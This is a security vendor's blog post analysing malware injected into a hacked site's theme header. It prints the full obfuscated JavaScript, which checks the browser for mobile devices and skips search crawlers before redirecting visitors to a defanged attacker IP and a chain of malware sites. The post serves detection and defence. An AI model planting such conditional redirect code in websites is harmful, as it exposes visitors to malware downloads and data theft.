• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Website Malware Targets Mobile Platforms

January 2, 2017Cesar AnjosEspanolPortugues

FacebookTwitterSubscribe

Navigating the web on a mobile device can be tricky even when you’re browsing clean sites. If hackers are involved, the frustration of a pop-up can turn into the dangerous possibility of harmful mobile malware.

The increase in mobile internet browsing has prompted attackers to adapt their techniques, targeting mobile-specific platforms and distributing spam and malware to these devices. Being proactive about the security of your site is key to keeping your visitors safe whether they’re on a desktop, laptop, tablet or phone.

Mobile Browser Redirects from Hacked Sites

Hackers are taking advantage of the growing mobile audience by showing unwanted pop-ups and redirecting them to malicious sites. Recently, we analyzed a hacked site that was demonstrating these exact behaviors. During our investigation, we found the following code infecting the header.php file of the theme:

<script>
if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("ooglebot")==-1){if(/(android|bb\d+|meego).+mobile
|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox
|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|
xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)
|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|
cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|
fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|
tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|emu|jigs|kddi|keji|kgt( |\/)|klon|kpt |
kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)
|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)
|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a
|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|
ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-
|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60
|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){
var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}}
)(navigator.userAgent||navigator.vendor||window.opera,'hxxp://185(.)93(.)187(.)41/kt/JpNx9n');}
</script>

This code specifically targets mobile devices and redirects them to a series of malicious websites:

  • Starting from: hxxp://185(.)93(.)187(.)41/kt/JpNx9n
  • Then, going to different sub-pages, such as hxxp://www(.)bestphoneapps(.)mobi (which is involved in malware campaigns)
  • Finally landing on hxxps://mobrevflwms(.)com, also related to malware campaigns

Mobile and Desktop Malware Downloads

Depending on the mobile browser and device your visitors are using while accessing the website, victims are either presented with a toolbar download page or are redirected to a mobile app download page. Both of these scenarios put website visitors in a dangerous position. If victims inadvertently add the mobile malware components to their devices, there can be serious consequences.

A few of the dangers of mobile malware include:

  • Allowing attackers to arbitrarily access, read, and interact with emails and backend interfaces;
  • Stealing of your data such as media files;
  • Ads being injected into pages they were not supposed to;
  • Giving sensitive information from their browsing activity;

If visitors happen to find themselves on those pages on Desktop they may be exposed to situations such as:

  • Potential installation of ransomware;
  • Installation of PuPs (Potential unwanted programs such as as injectors);
  • Installation of Keyloggers;
  • Installation of various rootkits or have your computer added to a Botnet and used against other targets;
  • They can covertly take over your browser and carry out actions in any backend you have access to such as any website you own/manage;

As a rule of thumb its best to never install anything you don’t explicitly mean to, and if you find yourself in a page that has no relation to the website you were at to immediately leave.

Protecting Your Site

As website owners, it’s our responsibility to ensure that our visitors have the best experience possible and will not be at risk when accessing our web properties.

If you’re concerned about your site, or a site that you’re visiting, scanning the site can provide some insight. Our free online scanner (SiteCheck) is tailored to emulate different mobile user agents and warn users about possible issues that may affect your computer when accessing a particular website.

If you are detecting similar redirects or suspect any unusual behavior, we are here to help.

FacebookTwitterSubscribe

Categories: Website Malware Infections, Website SecurityTags: Conditional Malware, Drive-by-Download, Malvertising, Redirects

About Cesar Anjos

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.